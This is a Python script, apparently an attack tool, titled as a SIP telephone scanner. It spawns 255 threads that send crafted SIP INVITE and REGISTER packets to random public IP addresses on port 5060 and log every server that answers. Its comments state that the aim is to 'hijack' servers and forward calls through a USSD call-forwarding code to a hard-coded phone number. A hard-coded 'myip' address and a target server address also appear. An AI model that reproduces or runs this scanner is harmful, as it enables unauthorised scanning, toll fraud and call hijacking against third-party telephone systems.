SIP Telephone Service ScAnNeR

1. import socket
2. import random
3. import select
4. import threading
5. import time
6.  
7. #IP data
8. servip="9.39.195.80" #reuse ipaddr for target sip server in order to hijack
9. myip="70.67.16.106"
10. port=5060
11.  
12. #INVITE data
13. name="James"
14. nameto="Herbert"
15. phoneno="*61*16043308323#" #hijack via call forwarding USSD code
16.  
17. #REGISTER data
18. enableregister=0 #enable registering but most sefvers nolonger support it
19. username="SELFCHECK" #default username
20. realm="asterisk" # default www authentication realm
21.  
22. #SIP data
23. sipdata="v=0\no="+nameto+" PHONENO PHONENO IN IP4 MYIP\ns=-\nc=IN IP4 MYIP\nt=0 0\nm=audio 49172 RTP/AVP 0\na=rtpmap:0 PCMU/8000\nport="+str(port)
24.  
25. #timeout and rate limiting options
26. timeout=0.3 #370 ms timeout
27. ratelimit=0
28.  
29. def findReplace(data, ip):
30.     return data.replace("SIPDATA", sipdata).replace("PHONENO", phoneno).replace("MYIP", myip).replace("SERVIP", servip).replace("IPADDR", ip).replace("PHONENO", phoneno).replace("CONTLEN", str(len(sipdata))).replace("PORT", str(port)).replace("NAME", name).replace("NAMTO", nameto).replace("USER", username).replace("REALM" ,realm)
31. sipdata=findReplace(sipdata, servip)
32. #open sip data file for reading
33. f=open("/sdcard/SIPSCAN1.txt", "r")
34. fdata1=f.read()
35. f.close()
36. f=open("/sdcard/SIPSCAN2.txt", "r")
37. fdata2=f.read()
38. f.close()
39.  
40. s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
41. s.bind(("", port))
42.  
43. def recvDatShiz(s):
44.     try:
45.         s.setblocking(0)
46.         ready = select.select([s], [], [], timeout)
47.         if ready[0]:
48.             data, addr = s.recvfrom(4096)
49.             return data, addr
50.     except:
51.         pass
52.     return b'', '0.0.0.0'
53. def dataCheck(data, ip):
54.     if data!=b'':
55.         if b"100 " in data or b"200 " in data or b"180 " in data: # check for auth or ringing
56.             print(data)
57.             print(ip)
58.             f=open("/sdcard/sip.txt", "a")
59.             f.write(ip+"\n")
60.             f.close()
61.     return data
62. def scanThread(fdata1, fdata2):
63.     while 1:
64.         ip=str(random.randrange(1,223))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))
65.         if ip.startswith("0") or ip.startswith("127") or ip.startswith("192") or ip.startswith("172") or ip.startswith("10."):
66.             continue
67.         try:
68.             if enableregister:
69.                 s.sendto(findReplace(fdata1, ip).encode(), (ip, port))
70.                 data, addr = recvDatShiz(s)
71.                 if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or "480" in data or data==b'':
72.                     continue
73.                 dataCheck(data, ip)
74.             s.sendto(findReplace(fdata2, ip).encode(), (ip, port))
75.             data, addr = recvDatShiz(s)
76.             #if data!=b"":
77.             #    print(data)
78.             if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or b"480" in data or data==b'':
79.                 continue
80.             dataCheck(data, ip)
81.         except Exception as e:
82.             #print(str(e))
83.             continue
84.         time.sleep(ratelimit)
85. for i in range(0, 255):
86.     threading.Thread(target=scanThread, args=(fdata1,fdata2,)).start()